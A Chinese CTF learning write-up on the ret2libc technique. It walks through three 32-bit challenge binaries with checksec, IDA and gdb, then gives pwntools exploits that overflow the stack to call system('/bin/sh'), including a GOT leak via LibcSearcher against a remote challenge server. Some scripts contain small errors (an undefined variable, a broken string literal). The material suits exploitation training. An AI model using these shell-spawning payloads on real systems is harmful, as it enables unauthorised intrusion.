学习ret2libc手法记录

ret2libc原理(动态编译)

ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。


ret2libc1

老规矩拿道题的第一步检查保护机制和多少位程序:(checksec ret2libc)


NX保护/32位程序

用IDA打开找到main函数F5查看伪代码


看到了gets函数可能存在栈溢出漏洞

发现了system的地址


system地址0x8048460

shift+f12看看有没有/bin/sh



/bin/sh地址0x8048720

思路大概就有了,通过溢出,跳转到到system函数执行”/bin/sh”拿shell。这里我们需要注意函数调用栈的结构,如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址,这里以填入任意字节比如'aaaa' 作为虚假的地址,其后参数对应的参数内容。

最后计算一下偏移量(112)


偏移量为112

exp如下

from pwn import*

 p = process("./ret2libc1")

#r = remote('ip',port)

bin_sh = 0x8048720

sys_addr = 0x8048460

payload = 'a'*112 + p32(sys_addr) + p32(0x1) + p32(bin_sh)

p.sendline(payload)

p.interactive()

ret2libc2

ret2libc2和ret2libc1的区别在于没有了 "/bin/sh" 字符串,需要通过 gets 函数写到一个可读可写的地方,通常会找 bss 段,然后去执行 /bin/sh


查看保护机制和多少位程序(checksec ret2libc2)


NX/32位

NX保护32位扔进IDA

sys_addr=0x8048490/get_addr=0x8048460

可能存在栈溢出也有system地址 shift+F12看一眼有没有/bin/sh


没有/bin/sh字串,所以需要我们自己需要通过gets把它写入.bss段,然后作为参数给system

找一下bass段的地址

readelf -S ret2libc2 | grep bss

bss_addr=0x804A040

再用vmmap检测一下bass段权限

gdb -q ret2libc2

start

vmmap

具有可读可写可执行权限

通过查找,可以找到的数据如下:

sys_addr=0x8048490

bss_addr=0x804A040

get_addr=0x8048460

在计算偏移量为(112)

exp1如下

from pwn import*

p = process("./ret2libc2")

#r = remote('ip',port)

sys_addr=0x8048490

get_addr=0x8048460

bss_addr=0x804A040

payload = 'a'*112 + p32 (get_addr) + p32(sys_addr) +p32(bss_addr) + p32(bss_addr)

p.sendline(payload)

p.sendline('/bin/sh')

p.interactive()


exp1栈结构

exp2如下

from pwn import*

p = process("./ret2libc2")

sys_addr=0x8048490

get_addr=0x8048460

bss_addr=0x804A040

pop_ret = 0x0804843d

payload = ''

payload += 'a'*112

payload += p32(gets_addr)

payload += p32(pop_ret)

payload += p32(bss_addr)

payload += p32(sys_addr)

payload += 'a'*4

payload += p32(bss_addr)

p.sendline(payload)

p.sendline('/bin/sh\')

p.interactive()

#寻找pop_ret:ROPgadget –binary ret2libc2 –only ‘pop|ret’| grep ‘ebx’


exp2栈布局

ret2libc3手法

动态编译的程序中真实地址=偏移地址+基地址,不同版本的libc库,其偏移不同,我们我们可以通过libc库版本去寻找每个函数的偏移,泄露已知函数的真实地址去计算其基地址,从而构造出system的函数的真实地址。


ret2libc3和ret2libc2和ret2libc1的区别在于没有 system 也没有 /bin/sh,需要使用 libc 中的 system 和 /bin/sh,知道了libc中的一个函数的地址就可以确定该程序利用的 libc,从而知道其他函数的地址。获得 libc 的某个函数的地址通常采用的方法是:通过 got 表泄露,但是由于libc的延迟绑定,需要泄露的是已经执行过的函数的地址

拿到题先查看一下保护机制


NX/32位

扔进ida观察

没有看到system


可能存在栈溢出

shift+f12看一眼有没有/bin/sh字符串


并没有/bin/sh

既然存在栈溢出就确定偏移量


偏移量为140

思路如下

通过第一次溢出,通过将 puts 的 PLT 地址放到返回处,泄漏出执行过的函数的 GOT 地址(实际上 write 的就可以)

将 write 的返回地址设置为 _start 函数(main () 函数是用户代码的入口,是对用户而言的;而_start () 函数是系统代码的入口,是程序真正的入口),方便再次用来执行 system('/bin/sh')

通过泄露的函数的 GOT 地址计算出 libc 中的 system 和 /bin/sh 的地址

再次通过溢出将返回地址覆盖成泄露出来的 system 的地址 getshell

exp如下

from pwn import *

from LibcSearcher import *

 #导入LibcSearch模块

r = remote('111.198.29.45',51596)

elf = ELF('./level3')

write_plt = elf.plt['write']

#要利用的函数

write_got = elf.got['write']

#要泄露的函数的GOT地址,里面的内容即真实地址

main_addr = elf.symbols['main']

#返回地址为main,使其还可溢出

payload = 'a'*140+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)r.recv()r.sendline(payload)write_addr = u32(r.recv()[:4])

#发送payload后会接收到write的真实地址

libc = LibcSearcher('write',write_addr)

#利用LibcSearcher寻找libc版本

base = write_addr - libc.dump('write')

#.dump为偏移地址

sys_addr = base + libc.dump('system')

sh_addr = base +libc.dump('str_bin_sh')

payload2 = 'a'*140 +p32(sys_addr)+'b'*4+p32(sh_addr)

r.recv()

r.sendline(payload2)

r.interactive()


知识补充:

动态编译与静态编译

1、动态编译的可执行文件需要附带一个的动态链接库(libc库),在执行时,需要调用其对应动态链接库中的命令。所以其优点一方面是缩小了执行文件本身的体积,另一方面是加快了编译速度,节省了系统资源。缺点一是哪怕是很简单的程序,只用到了链接库中的一两条命令,也需要附带一个相对庞大的链接库;二是如果其他计算机上没有安装对应的运行库,则用动态编译的可执行文件就不能运行。

2、静态编译就是编译器在编译可执行文件的时候,将可执行文件需要调用的对应动态链接库(.so)中的部分提取出来,链接到可执行文件中去,使可执行文件在运行的时候不依赖于动态链接库。所以其优缺点与动态编译的可执行文件正好互补。

GOT表和PLT表

在目前的 C 程序中,libc中的函数都是通过 GOT 表来跳转的。通过PLT表作为中间表链接call命令和got表,而got表中的内容是函数的真实地址。在一些pwn题中,要泄漏出的函数地址应该是got表中的内容,为了泄漏这些真正的地址,往往会用到read,write,put等函数,通过已知同时存在于got和libc的函数地址,可以得出偏移量,接着就能通过偏移量找到system函数的真正地址,从而进行ret2libc操作.

摘自某大佬博客



推荐其他的师傅wp:

ATFWUS

YeeZi_

西杭

ret2libc3

此篇文章如果存在问题,还望大佬批评指正

你可能感兴趣的:(学习ret2libc手法记录)